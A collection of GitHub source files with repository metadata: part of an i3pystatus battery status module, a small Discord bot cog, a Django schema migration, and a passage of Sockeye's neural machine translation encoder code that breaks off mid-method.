        # (here and near the end) — confirm whether one entry can be removed.
        ("not_present_text", "Text displayed if the battery is not present. No formatters are available"),
        ("alert", "Display a libnotify-notification on low battery"),
        ("critical_level_command", "Runs a shell command in the case of a critical power state"),
        "critical_level_percentage",
        "alert_percentage",
        ("alert_format_title", "The title of the notification, all formatters can be used"),
        ("alert_format_body", "The body text of the notification, all formatters can be used"),
        ("path", "Override the default-generated path and specify the full path for a single battery"),
        ("base_path", "Override the default base path for searching for batteries"),
        ("battery_prefix", "Override the default battery prefix"),
        ("status", "A dictionary mapping ('DPL', 'DIS', 'CHR', 'FULL') to alternative names"),
        ("color", "The text color"),
        ("full_color", "The full color"),
        ("charging_color", "The charging color"),
        ("critical_color", "The critical color"),
        ("not_present_color", "The not present color."),
        ("not_present_text", "The text to display when the battery is not present. Provides {battery_ident} as formatting option"),
        ("no_text_full", "Don't display text when battery is full - 100%"),
    )
    battery_ident = "ALL"
    format = "{status} {remaining}"
    # Default display names for the four internal status codes.
    status = {
        "DPL": "DPL",
        "CHR": "CHR",
        "DIS": "DIS",
        "FULL": "FULL",
    }
    not_present_text = "Battery {battery_ident} not present"
    alert = False
    critical_level_command = ""
    critical_level_percentage = 1
    alert_percentage = 10
    alert_format_title = "Low battery"
    alert_format_body = "Battery {battery_ident} has only {percentage:.2f}% ({remaining:%E%hh:%Mm}) remaining!"
    color = "#ffffff"
    full_color = "#00ff00"
    charging_color = "#00ff00"
    critical_color = "#ff0000"
    not_present_color = "#ffffff"
    no_text_full = False
    battery_prefix = 'BAT'
    base_path = '/sys/class/power_supply'
    path = None
    # NOTE(review): class-level mutable list — init() appends to it, so the
    # scan result is shared across all instances of this module; confirm
    # this sharing is intended.
    paths = []
    def percentage(self, batteries, design=False):
        """Mean percentage across *batteries* (design-relative if *design*)."""
        total = 0
        for battery in batteries:
            total += battery.percentage(design)
        return total / len(batteries)
    def consumption(self, batteries):
        """Sum of absolute power draw (W) over batteries with a reading."""
        consumption = 0
        for battery in batteries:
            if battery.consumption() is not None:
                consumption += battery.consumption()
        return consumption
    def abs_consumption(self, batteries):
        """Net power flow: negative while discharging, positive while charging."""
        abs_consumption = 0
        for battery in batteries:
            if battery.consumption() is None:
                continue
            if battery.status() == 'Discharging':
                abs_consumption -= battery.consumption()
            elif battery.status() == 'Charging':
                abs_consumption += battery.consumption()
        return abs_consumption
    def battery_status(self, batteries):
        """Aggregate status across all batteries, keyed on net power flow."""
        abs_consumption = self.abs_consumption(batteries)
        if abs_consumption > 0:
            return 'Charging'
        elif abs_consumption < 0:
            return 'Discharging'
        else:
            # No net flow: fall back to the last battery's own status.
            return batteries[-1].status()
    def remaining(self, batteries):
        """Aggregate minutes until empty/full; 0 when there is no net flow."""
        wh_depleted = 0
        wh_remaining = 0
        abs_consumption = self.abs_consumption(batteries)
        for battery in batteries:
            wh_remaining += battery.wh_remaining()
            wh_depleted += battery.wh_depleted()
        if abs_consumption == 0:
            return 0
        elif abs_consumption > 0:
            # Charging: time to refill the depleted energy.
            return wh_depleted / self.consumption(batteries) * 60
        elif abs_consumption < 0:
            # Discharging: time to drain what is left.
            return wh_remaining / self.consumption(batteries) * 60
    def init(self):
        """Discover uevent paths once; an explicit `path` setting wins."""
        if not self.paths or (self.path and self.path not in self.paths):
            bat_dir = self.base_path
            if os.path.exists(bat_dir) and not self.path:
                _, dirs, _ = next(os.walk(bat_dir))
                all_bats = [x for x in dirs if x.startswith(self.battery_prefix)]
                for bat in all_bats:
                    self.paths.append(os.path.join(bat_dir, bat, 'uevent'))
            if self.path:
                self.paths = [self.path]
    def run(self):
        """Poll all matching batteries and publish the formatted bar output."""
        urgent = False
        color = self.color
        batteries = []
        for path in self.paths:
            # battery_ident filters by substring; 'ALL' takes every path.
            if self.battery_ident == 'ALL' or path.find(self.battery_ident) >= 0:
                try:
                    batteries.append(Battery.create(path))
                except FileNotFoundError:
                    # Battery was removed between scan and read; skip it.
                    pass
        if not batteries:
            format_dict = {'battery_ident': self.battery_ident}
            self.output = {
                "full_text": formatp(self.not_present_text, **format_dict),
                "color": self.not_present_color,
            }
            return
        if self.no_text_full:
            if self.battery_status(batteries) == "Full":
                self.output = {
                    "full_text": ""
                }
                return
        fdict = {
            "battery_ident": self.battery_ident,
            "no_of_batteries": len(batteries),
            "percentage": self.percentage(batteries),
            "percentage_design": self.percentage(batteries, design=True),
            "consumption": self.consumption(batteries),
            # Placeholder; replaced below when charging/discharging.
            "remaining": TimeWrapper(0, "%E%h:%M"),
            "bar": make_bar(self.percentage(batteries)),
            "bar_design": make_bar(self.percentage(batteries, design=True)),
        }
        status = self.battery_status(batteries)
        if status in ["Charging", "Discharging"]:
            remaining = self.remaining(batteries)
            # remaining() yields minutes; TimeWrapper takes seconds.
            fdict["remaining"] = TimeWrapper(remaining * 60, "%E%h:%M")
            if status == "Discharging":
                fdict["status"] = "DIS"
                if self.percentage(batteries) <= self.alert_percentage:
                    urgent = True
                    color = self.critical_color
            else:
                fdict["status"] = "CHR"
                color = self.charging_color
        elif status == 'Depleted':
            fdict["status"] = "DPL"
            color = self.critical_color
        else:
            fdict["status"] = "FULL"
            color = self.full_color
        if self.critical_level_command and fdict["status"] == "DIS" and fdict["percentage"] <= self.critical_level_percentage:
            run_through_shell(self.critical_level_command, enable_shell=True)
        if self.alert and fdict["status"] == "DIS" and fdict["percentage"] <= self.alert_percentage:
            DesktopNotification(
                title=formatp(self.alert_format_title, **fdict),
                body=formatp(self.alert_format_body, **fdict),
                icon="battery-caution",
                urgency=2,
                timeout=60,
            ).display()
        # Map the internal status code to the user-configured display name.
        fdict["status"] = self.status[fdict["status"]]
        self.data = fdict
        self.output = {
            "full_text": formatp(self.format, **fdict),
            "instance": self.battery_ident,
            "urgent": urgent,
            "color": color,
        }
| {
"content_hash": "10d13fe7d15a61d8a33e44b6636a15c7",
"timestamp": "",
"source": "github",
"line_count": 322,
"max_line_length": 131,
"avg_line_length": 38.56832298136646,
"alnum_prop": 0.5881310894596988,
"repo_name": "juliushaertl/i3pystatus",
"id": "93eef7dce4ea7f8a4c8ccd13af972076e195e004",
"size": "12437",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "i3pystatus/battery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "282586"
},
{
"name": "Shell",
"bytes": "801"
}
],
"symlink_target": ""
} |
import discord
from discord.ext import commands
class Misc(commands.Cog):
    """I'm not very good at categorizing things."""

    def __init__(self, bot):
        self.chiaki = bot

    async def _lookup(self, context, user):
        # Resolve a user string to a member via the Nicknames cog.
        return await self.chiaki.get_cog('Nicknames').get_member(context, user)

    @commands.command()
    async def say(self, context, *, repeat):
        """A generic repeat command."""
        await context.send(repeat)

    @commands.command()
    async def handhold(self, context):
        """Sex is lewd because it can lead to handholding."""
        await context.send('That\'s l-lewd!')

    @commands.command()
    async def nerd(self, context, *, user):
        """Determines if user is a nerd."""
        member = await self._lookup(context, user)
        if not member:
            await context.send('I don\'t know who that is?')
        elif member.id == 106971793868197888:
            # that's me!
            await context.send('{0} is a cute anime girl.'.format(member.display_name))
        elif member.bot:
            await context.send('..........')
        else:
            await context.send('{0} is most definitely a nerd.'.format(member.display_name))

    @commands.command()
    async def icon(self, context, *, user):
        """Links to a larger version of the user's icon."""
        member = await self._lookup(context, user)
        if member:
            await context.send(member.avatar_url)
        else:
            await context.send('I don\'t know who that is?')
def setup(bot):
    """Standard discord.py extension entry point: register the Misc cog."""
    cog = Misc(bot)
    bot.add_cog(cog)
| {
"content_hash": "aeef088c34e76951496b8ee715775abf",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 81,
"avg_line_length": 34.666666666666664,
"alnum_prop": 0.5692307692307692,
"repo_name": "adelie/chiakibot",
"id": "5a319e919290b349fc97716711e4558a8408fa57",
"size": "1560",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cogs/misc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "30899"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: makes Message.binary_content nullable
    # and pins the FK delete behaviour to CASCADE. Do not edit by hand.
    dependencies = [("contentstore", "0003_auto_20160513_1115")]
    operations = [
        migrations.AlterField(
            model_name="message",
            name="binary_content",
            field=models.ForeignKey(
                blank=True,
                null=True,
                on_delete=django.db.models.deletion.CASCADE,
                related_name="message",
                to="contentstore.BinaryContent",
            ),
        )
    ]
| {
"content_hash": "0d6e14f3301c0f548286939e643eeb06",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 64,
"avg_line_length": 26.73913043478261,
"alnum_prop": 0.5739837398373984,
"repo_name": "praekelt/seed-stage-based-messaging",
"id": "cc06d2437373d76fb10362931b67e9132c436b3a",
"size": "687",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "contentstore/migrations/0004_auto_20160810_0916.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Dockerfile",
"bytes": "371"
},
{
"name": "HTML",
"bytes": "1428"
},
{
"name": "Python",
"bytes": "306458"
}
],
"symlink_target": ""
} |
"""
Encoders for sequence-to-sequence models.
"""
import inspect
import logging
from abc import ABC, abstractmethod
from math import ceil, floor
from typing import Callable, List, Optional, Tuple, Union, Dict
import mxnet as mx
from . import config
from . import constants as C
from . import convolution
from . import rnn
from . import transformer
from . import utils
logger = logging.getLogger(__name__)
ImageEncoderConfig = None
def get_encoder(config: 'EncoderConfig', prefix: str = '') -> 'Encoder':
    """Build the encoder stack matching the concrete type of *config*.

    :param config: Encoder configuration; its class selects the encoder family.
    :param prefix: Prefix for variable names.
    :return: Encoder instance.
    :raises ValueError: for unsupported configuration types.
    """
    if isinstance(config, RecurrentEncoderConfig):
        return get_recurrent_encoder(config, prefix)
    if isinstance(config, transformer.TransformerConfig):
        return get_transformer_encoder(config, prefix)
    if isinstance(config, ConvolutionalEncoderConfig):
        return get_convolutional_encoder(config, prefix)
    if isinstance(config, EmptyEncoderConfig):
        return EncoderSequence([EmptyEncoder(config)], config.dtype)
    # Imported lazily, matching the original's deferred import of the image
    # captioning package.
    from .image_captioning.encoder import ImageLoadedCnnEncoderConfig, \
        get_image_cnn_encoder
    if isinstance(config, ImageLoadedCnnEncoderConfig):
        return get_image_cnn_encoder(config)
    raise ValueError("Unsupported encoder configuration")
class RecurrentEncoderConfig(config.Config):
    """
    Recurrent encoder configuration.
    :param rnn_config: RNN configuration.
    :param conv_config: Optional configuration for convolutional embedding.
    :param reverse_input: Reverse embedding sequence before feeding into RNN.
    :param dtype: Data type.
    """
    def __init__(self,
                 rnn_config: rnn.RNNConfig,
                 conv_config: Optional['ConvolutionalEmbeddingConfig'] = None,
                 reverse_input: bool = False,
                 dtype: str = C.DTYPE_FP32) -> None:
        super().__init__()
        self.rnn_config = rnn_config
        # When set, a ConvolutionalEmbeddingEncoder front-end is inserted
        # before the RNN stack (see get_recurrent_encoder).
        self.conv_config = conv_config
        self.reverse_input = reverse_input
        self.dtype = dtype
class ConvolutionalEncoderConfig(config.Config):
    """
    Convolutional encoder configuration.
    :param num_embed: Source embedding size.
    :param max_seq_len_source: Maximum source sequence length (bounds the positional embeddings).
    :param cnn_config: CNN configuration.
    :param num_layers: The number of convolutional layers on top of the embeddings.
    :param positional_embedding_type: The type of positional embedding.
    :param dtype: Data type.
    """
    def __init__(self,
                 num_embed: int,
                 max_seq_len_source: int,
                 cnn_config: convolution.ConvolutionConfig,
                 num_layers: int,
                 positional_embedding_type: str,
                 dtype: str = C.DTYPE_FP32) -> None:
        super().__init__()
        self.num_embed = num_embed
        self.num_layers = num_layers
        self.cnn_config = cnn_config
        self.max_seq_len_source = max_seq_len_source
        self.positional_embedding_type = positional_embedding_type
        self.dtype = dtype
class EmptyEncoderConfig(config.Config):
    """
    Empty encoder configuration.
    :param num_embed: source embedding size.
    :param num_hidden: the representation size of this encoder.
    :param dtype: Data type.
    """
    def __init__(self,
                 num_embed: int,
                 num_hidden: int,
                 dtype: str = C.DTYPE_FP32) -> None:
        super().__init__()
        self.num_embed = num_embed
        self.num_hidden = num_hidden
        self.dtype = dtype
        # NOTE(review): presumably tells config.Config to tolerate missing
        # attributes when loading serialized configs — confirm.
        self.allow_missing = True
def get_recurrent_encoder(config: RecurrentEncoderConfig, prefix: str) -> 'Encoder':
    """
    Returns an encoder stack with a bi-directional RNN, and a variable number of uni-directional forward RNNs.
    :param config: Configuration for recurrent encoder.
    :param prefix: Prefix for variable names.
    :return: Encoder instance.
    """
    # TODO give more control on encoder architecture
    encoder_seq = EncoderSequence([], config.dtype)
    if config.conv_config is not None:
        # Optional convolutional character-embedding front-end.
        encoder_seq.append(ConvolutionalEmbeddingEncoder, config=config.conv_config,
                           prefix=prefix + C.CHAR_SEQ_ENCODER_PREFIX)
        if config.conv_config.add_positional_encoding:
            # If specified, add positional encodings to segment embeddings
            encoder_seq.append(AddSinCosPositionalEmbeddings,
                               num_embed=config.conv_config.num_embed,
                               scale_up_input=False,
                               scale_down_positions=False,
                               prefix="%s%sadd_positional_encodings" % (prefix, C.CHAR_SEQ_ENCODER_PREFIX))
        # The RNN layers below consume time-major data.
        encoder_seq.append(ConvertLayout, infer_hidden=True, target_layout=C.TIME_MAJOR)
    else:
        encoder_seq.append(ConvertLayout, target_layout=C.TIME_MAJOR, num_hidden=0)
    if config.reverse_input:
        encoder_seq.append(ReverseSequence, infer_hidden=True)
    if config.rnn_config.residual:
        utils.check_condition(config.rnn_config.first_residual_layer >= 2,
                              "Residual connections on the first encoder layer are not supported")
    # One layer bi-directional RNN:
    encoder_seq.append(BiDirectionalRNNEncoder,
                       rnn_config=config.rnn_config.copy(num_layers=1),
                       prefix=prefix + C.BIDIRECTIONALRNN_PREFIX,
                       layout=C.TIME_MAJOR)
    if config.rnn_config.num_layers > 1:
        # Stacked uni-directional RNN:
        # Because we already have a one layer bi-rnn we reduce the num_layers as well as the first_residual_layer.
        remaining_rnn_config = config.rnn_config.copy(num_layers=config.rnn_config.num_layers - 1,
                                                      first_residual_layer=config.rnn_config.first_residual_layer - 1)
        encoder_seq.append(RecurrentEncoder,
                           rnn_config=remaining_rnn_config,
                           prefix=prefix + C.STACKEDRNN_PREFIX,
                           layout=C.TIME_MAJOR)
    # Restore batch-major layout for downstream components.
    encoder_seq.append(ConvertLayout, infer_hidden=True, target_layout=C.BATCH_MAJOR)
    return encoder_seq
def get_convolutional_encoder(config: ConvolutionalEncoderConfig, prefix: str) -> 'Encoder':
    """
    Creates a convolutional encoder: positional embeddings followed by the
    convolutional stack.
    :param config: Configuration for convolutional encoder.
    :param prefix: Prefix for variable names.
    :return: Encoder instance.
    """
    pos_cls, pos_params = _get_positional_embedding_params(
        config.positional_embedding_type,
        config.num_embed,
        max_seq_len=config.max_seq_len_source,
        fixed_pos_embed_scale_up_input=False,
        fixed_pos_embed_scale_down_positions=True,
        prefix=prefix + C.SOURCE_POSITIONAL_EMBEDDING_PREFIX)
    encoders = EncoderSequence([], dtype=config.dtype)
    encoders.append(pos_cls, **pos_params)
    encoders.append(ConvolutionalEncoder, config=config)
    return encoders
def get_transformer_encoder(config: transformer.TransformerConfig, prefix: str) -> 'Encoder':
    """
    Returns a Transformer encoder, consisting of an embedding layer with
    positional encodings and a TransformerEncoder instance.
    :param config: Configuration for transformer encoder.
    :param prefix: Prefix for variable names.
    :return: Encoder instance.
    """
    pos_cls, pos_params = _get_positional_embedding_params(
        config.positional_embedding_type,
        config.model_size,
        config.max_seq_len_source,
        fixed_pos_embed_scale_up_input=True,
        fixed_pos_embed_scale_down_positions=False,
        prefix=prefix + C.SOURCE_POSITIONAL_EMBEDDING_PREFIX)
    encoders = EncoderSequence([], dtype=config.dtype)
    encoders.append(pos_cls, **pos_params)
    if config.conv_config is not None:
        # Optional convolutional character-embedding front-end.
        encoders.append(ConvolutionalEmbeddingEncoder, config=config.conv_config,
                        prefix=prefix + C.CHAR_SEQ_ENCODER_PREFIX)
    encoders.append(TransformerEncoder, config=config, prefix=prefix + C.TRANSFORMER_ENCODER_PREFIX)
    return encoders
class Encoder(ABC):
    """
    Generic encoder interface.
    :param dtype: Data type.
    """
    @abstractmethod
    def __init__(self, dtype):
        # Log the concrete subclass and dtype to aid debugging model setup.
        logger.info('{}.{} dtype: {}'.format(self.__module__, self.__class__.__name__, dtype))
        self.dtype = dtype
    @abstractmethod
    def encode(self,
               data: mx.sym.Symbol,
               data_length: Optional[mx.sym.Symbol],
               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        """
        Encodes data given sequence lengths of individual examples and maximum sequence length.
        :param data: Input data.
        :param data_length: Vector with sequence lengths.
        :param seq_len: Maximum sequence length.
        :return: Encoded versions of input data (data, data_length, seq_len).
        """
        pass
    @abstractmethod
    def get_num_hidden(self) -> int:
        """
        :return: The representation size of this encoder.
        """
        raise NotImplementedError()
    def get_encoded_seq_len(self, seq_len: int) -> int:
        """
        :return: The size of the encoded sequence. Identity by default;
                 subclasses that alter sequence length override this.
        """
        return seq_len
    def get_max_seq_len(self) -> Optional[int]:
        """
        :return: The maximum length supported by the encoder if such a restriction exists.
        """
        return None
class ConvertLayout(Encoder):
    """
    Swaps the batch and time axes so downstream components see the requested
    layout, tagging the resulting symbol with the __layout__ attribute.
    :param target_layout: The target layout to convert to (C.BATCH_MAJOR or C.TIME_MAJOR).
    :param num_hidden: The number of hidden units of the previous encoder.
    :param dtype: Data type.
    """

    def __init__(self, target_layout: str, num_hidden: int, dtype: str = C.DTYPE_FP32) -> None:
        assert target_layout in (C.BATCH_MAJOR, C.TIME_MAJOR)
        super().__init__(dtype)
        self.num_hidden = num_hidden
        self.target_layout = target_layout

    def encode(self,
               data: mx.sym.Symbol,
               data_length: Optional[mx.sym.Symbol],
               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        """
        Swap axes 0 and 1 of *data*; lengths and seq_len pass through.
        :param data: Input data.
        :param data_length: Vector with sequence lengths.
        :param seq_len: Maximum sequence length.
        :return: (swapped data, data_length, seq_len).
        """
        with mx.AttrScope(__layout__=self.target_layout):
            swapped = mx.sym.swapaxes(data=data, dim1=0, dim2=1)
        return swapped, data_length, seq_len

    def get_num_hidden(self) -> int:
        # A layout swap does not change the hidden size of its input.
        return self.num_hidden
class ReverseSequence(Encoder):
    """
    Reverses each input sequence (respecting its individual length).
    Requires time-major layout.
    :param dtype: Data type.
    """

    def __init__(self, num_hidden: int, dtype: str = C.DTYPE_FP32) -> None:
        super().__init__(dtype)
        self.num_hidden = num_hidden

    def encode(self,
               data: mx.sym.Symbol,
               data_length: mx.sym.Symbol,
               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        # use_sequence_length=True keeps padding in place while reversing
        # only the valid portion of each sequence.
        reversed_data = mx.sym.SequenceReverse(data=data, sequence_length=data_length, use_sequence_length=True)
        return reversed_data, data_length, seq_len

    def get_num_hidden(self):
        return self.num_hidden
class FactorConfig(config.Config):
    """
    Configuration of a single source factor embedding.
    :param vocab_size: Size of the factor vocabulary.
    :param num_embed: Factor embedding size.
    """
    def __init__(self, vocab_size: int, num_embed: int) -> None:
        super().__init__()
        self.vocab_size = vocab_size
        self.num_embed = num_embed
class EmbeddingConfig(config.Config):
    """
    Configuration for an embedding layer, optionally extended with
    additional source-factor embeddings.
    :param vocab_size: Size of the primary vocabulary.
    :param num_embed: Primary embedding size.
    :param dropout: Dropout probability applied to the embeddings.
    :param factor_configs: Optional per-factor embedding configurations.
    :param dtype: Data type.
    """
    def __init__(self,
                 vocab_size: int,
                 num_embed: int,
                 dropout: float,
                 factor_configs: Optional[List[FactorConfig]] = None,
                 dtype: str = C.DTYPE_FP32) -> None:
        super().__init__()
        self.vocab_size = vocab_size
        self.num_embed = num_embed
        self.dropout = dropout
        self.factor_configs = factor_configs
        # Primary embedding plus one slot per configured factor.
        self.num_factors = 1 if factor_configs is None else 1 + len(factor_configs)
        self.dtype = dtype
class Embedding(Encoder):
    """
    Thin wrapper around MXNet's Embedding symbol. Works with both time- and batch-major data layouts.
    :param config: Embedding config.
    :param prefix: Name prefix for symbols of this encoder.
    :param embed_weight: Optionally use an existing embedding matrix instead of creating a new one.
    :param is_source: Whether this is the source embedding instance. Default: False.
    """
    def __init__(self,
                 config: EmbeddingConfig,
                 prefix: str,
                 embed_weight: Optional[mx.sym.Symbol] = None,
                 is_source: bool = False) -> None:
        super().__init__(config.dtype)
        self.config = config
        self.prefix = prefix
        self.embed_weight = embed_weight
        self.is_source = is_source
        if self.embed_weight is None:
            # Weight name "<prefix>weight" is part of the checkpoint format;
            # do not rename.
            self.embed_weight = mx.sym.Variable(prefix + "weight",
                                                shape=(self.config.vocab_size, self.config.num_embed))
        self.embed_factor_weights = []  # type: List[mx.sym.Symbol]
        if self.config.factor_configs is not None:
            # Factors weights aren't shared so they're not passed in and we create them here.
            for i, fc in enumerate(self.config.factor_configs):
                self.embed_factor_weights.append(mx.sym.Variable(prefix + "factor%d_weight" % i,
                                                                 shape=(fc.vocab_size, fc.num_embed)))
    def encode(self,
               data: mx.sym.Symbol,
               data_length: Optional[mx.sym.Symbol],
               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        """
        Encodes data given sequence lengths of individual examples and maximum sequence length.
        :param data: Input data.
        :param data_length: Vector with sequence lengths.
        :param seq_len: Maximum sequence length.
        :return: Encoded versions of input data (data, data_length, seq_len).
        """
        factor_embeddings = []  # type: List[mx.sym.Symbol]
        if self.is_source:
            # Source data carries the primary token ids plus factor ids
            # stacked along axis 2; split them apart before embedding.
            data, *data_factors = mx.sym.split(data=data,
                                               num_outputs=self.config.num_factors,
                                               axis=2,
                                               squeeze_axis=True, name=self.prefix + "factor_split")
            if self.config.factor_configs is not None:
                for i, (factor_data, factor_config, factor_weight) in enumerate(zip(data_factors,
                                                                                    self.config.factor_configs,
                                                                                    self.embed_factor_weights)):
                    factor_embeddings.append(mx.sym.Embedding(data=factor_data,
                                                              input_dim=factor_config.vocab_size,
                                                              weight=factor_weight,
                                                              output_dim=factor_config.num_embed,
                                                              name=self.prefix + "factor%d_embed" % i))
        embedding = mx.sym.Embedding(data=data,
                                     input_dim=self.config.vocab_size,
                                     weight=self.embed_weight,
                                     output_dim=self.config.num_embed,
                                     name=self.prefix + "embed")
        if self.config.factor_configs is not None:
            # Factor embeddings are concatenated onto the primary embedding.
            embedding = mx.sym.concat(embedding, *factor_embeddings, dim=2, name=self.prefix + "embed_plus_factors")
        if self.config.dropout > 0:
            embedding = mx.sym.Dropout(data=embedding, p=self.config.dropout, name="source_embed_dropout")
        return embedding, data_length, seq_len
    def get_num_hidden(self) -> int:
        """
        Return the representation size of this encoder.
        """
        return self.config.num_embed
class PassThroughEmbeddingConfig(EmbeddingConfig):
    """Embedding config for inputs that are passed through unembedded
    (vocab/embedding sizes zeroed out, no dropout, no factors)."""
    def __init__(self) -> None:
        super().__init__(vocab_size=0, num_embed=0, dropout=0.0, factor_configs=None)
class PassThroughEmbedding(Encoder):
    """
    This is an embedding which passes through an input symbol without doing any operation.
    :param config: PassThroughEmbeddingConfig config.
    """
    def __init__(self,
                 config: PassThroughEmbeddingConfig) -> None:
        # Consistency fix: use the shared dtype constant instead of the
        # 'float32' literal used by no other encoder in this module
        # (C.DTYPE_FP32 == 'float32').
        super().__init__(C.DTYPE_FP32)
        self.config = config
    def encode(self,
               data: mx.sym.Symbol,
               data_length: Optional[mx.sym.Symbol],
               seq_len: int = 0) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        """
        Pass through the inputs unchanged.
        :param data: Input data.
        :param data_length: Vector with sequence lengths.
        :param seq_len: Maximum sequence length (unused; defaults to 0).
        :return: (data, data_length, seq_len) unchanged.
        """
        return data, data_length, seq_len
    def get_num_hidden(self) -> int:
        """
        Return the representation size of this encoder (always 0).
        """
        return 0
class PositionalEncoder(Encoder):
    """Encoder interface for components that can additionally encode a batch
    of explicit scalar positions (see encode_positions)."""
    @abstractmethod
    def encode_positions(self,
                         positions: mx.sym.Symbol,
                         data: mx.sym.Symbol) -> mx.sym.Symbol:
        """
        Add positional encodings to the data using the provided positions.
        :param positions: (batch_size,)
        :param data: (batch_size, num_embed)
        :return: (batch_size, num_embed)
        """
        pass
class AddSinCosPositionalEmbeddings(PositionalEncoder):
    """
    Takes an encoded sequence and adds fixed positional embeddings as in Vaswani et al, 2017 to it.
    :param num_embed: Embedding size.
    :param prefix: Name prefix for symbols of this encoder.
    :param scale_up_input: If True, scales input data up by num_embed ** 0.5.
    :param scale_down_positions: If True, scales positional embeddings down by num_embed ** -0.5.
    :param dtype: Data type.
    """
    def __init__(self,
                 num_embed: int,
                 prefix: str,
                 scale_up_input: bool,
                 scale_down_positions: bool,
                 dtype: str = C.DTYPE_FP32) -> None:
        # Sin/cos channel pairs require an even embedding size.
        utils.check_condition(num_embed % 2 == 0, "Positional embeddings require an even embedding size it "
                                                  "is however %d." % num_embed)
        super().__init__(dtype)
        self.scale_up_input = scale_up_input
        self.scale_down_positions = scale_down_positions
        self.num_embed = num_embed
        self.prefix = prefix
    def encode(self,
               data: mx.sym.Symbol,
               data_length: Optional[mx.sym.Symbol],
               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        """
        :param data: (batch_size, source_seq_len, num_embed)
        :param data_length: (batch_size,)
        :param seq_len: sequence length.
        :return: (batch_size, source_seq_len, num_embed)
        """
        # add positional embeddings to data
        if self.scale_up_input:
            data = data * (self.num_embed ** 0.5)
        # The encodings are constants; BlockGrad stops any gradient flow
        # into them.
        positions = mx.sym.BlockGrad(mx.symbol.Custom(length=seq_len,
                                                      depth=self.num_embed,
                                                      name="%spositional_encodings" % self.prefix,
                                                      op_type='positional_encodings'))
        if self.scale_down_positions:
            positions = positions * (self.num_embed ** -0.5)
        embedding = mx.sym.broadcast_add(data, positions)
        return embedding, data_length, seq_len
    def encode_positions(self,
                         positions: mx.sym.Symbol,
                         data: mx.sym.Symbol) -> mx.sym.Symbol:
        """
        :param positions: (batch_size,)
        :param data: (batch_size, num_embed)
        :return: (batch_size, num_embed)
        """
        # (batch_size, 1)
        positions = mx.sym.expand_dims(positions, axis=1)
        # (num_embed,)
        channels = mx.sym.arange(0, self.num_embed // 2)
        # (1, num_embed,)
        scaling = mx.sym.expand_dims(1. / mx.sym.pow(10000, (2 * channels) / self.num_embed), axis=0)
        # (batch_size, num_embed/2)
        scaled_positions = mx.sym.dot(positions, scaling)
        sin = mx.sym.sin(scaled_positions)
        cos = mx.sym.cos(scaled_positions)
        # (batch_size, num_embed)
        pos_embedding = mx.sym.concat(sin, cos, dim=1)
        if self.scale_up_input:
            data = data * (self.num_embed ** 0.5)
        if self.scale_down_positions:
            pos_embedding = pos_embedding * (self.num_embed ** -0.5)
        return mx.sym.broadcast_add(data, pos_embedding, name="%s_add" % self.prefix)
    def get_num_hidden(self) -> int:
        return self.num_embed
class AddLearnedPositionalEmbeddings(PositionalEncoder):
"""
Takes an encoded sequence and adds positional embeddings to it, which are learned jointly. Note that this will
limited the maximum sentence length during decoding.
:param num_embed: Embedding size.
:param max_seq_len: Maximum sequence length.
:param prefix: Name prefix for symbols of this encoder.
:param embed_weight: Optionally use an existing embedding matrix instead of creating a new one.
:param dtype: Data type.
"""
def __init__(self,
num_embed: int,
max_seq_len: int,
prefix: str,
embed_weight: Optional[mx.sym.Symbol] = None,
dtype: str = C.DTYPE_FP32) -> None:
super().__init__(dtype)
self.num_embed = num_embed
self.max_seq_len = max_seq_len
self.prefix = prefix
if embed_weight is not None:
self.embed_weight = embed_weight
else:
self.embed_weight = mx.sym.Variable(prefix + "weight")
def encode(self,
data: mx.sym.Symbol,
data_length: Optional[mx.sym.Symbol],
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
:param data: (batch_size, source_seq_len, num_embed)
:param data_length: (batch_size,)
:param seq_len: sequence length.
:return: (batch_size, source_seq_len, num_embed)
"""
# (1, source_seq_len)
positions = mx.sym.expand_dims(data=mx.sym.arange(start=0, stop=seq_len, step=1), axis=0)
# (1, source_seq_len, num_embed)
pos_embedding = mx.sym.Embedding(data=positions,
input_dim=self.max_seq_len,
weight=self.embed_weight,
output_dim=self.num_embed,
name=self.prefix + "pos_embed")
return mx.sym.broadcast_add(data, pos_embedding, name="%s_add" % self.prefix), data_length, seq_len
def encode_positions(self,
positions: mx.sym.Symbol,
data: mx.sym.Symbol) -> mx.sym.Symbol:
"""
:param positions: (batch_size,)
:param data: (batch_size, num_embed)
:return: (batch_size, num_embed)
"""
# (batch_size, source_seq_len, num_embed)
pos_embedding = mx.sym.Embedding(data=positions,
input_dim=self.max_seq_len,
weight=self.embed_weight,
output_dim=self.num_embed,
name=self.prefix + "pos_embed")
return mx.sym.broadcast_add(data, pos_embedding, name="%s_add" % self.prefix)
    def get_num_hidden(self) -> int:
        """Return the representation size: equal to the embedding size."""
        return self.num_embed
    def get_max_seq_len(self) -> Optional[int]:
        """Return the maximum supported sequence length (size of the learned table)."""
        # we can only support sentences as long as the maximum length during training.
        return self.max_seq_len
class NoOpPositionalEmbeddings(PositionalEncoder):
    """
    Pass-through positional encoder: leaves its inputs untouched.

    Providing this no-op implementation lets callers handle "no positional
    embedding" uniformly instead of branching on a flag.

    :param num_embed: Embedding size reported by :meth:`get_num_hidden`.
    :param dtype: Data type.
    """
    def __init__(self, num_embed, dtype: str = C.DTYPE_FP32) -> None:
        super().__init__(dtype)
        self.num_embed = num_embed
    def encode(self,
               data: mx.sym.Symbol,
               data_length: Optional[mx.sym.Symbol],
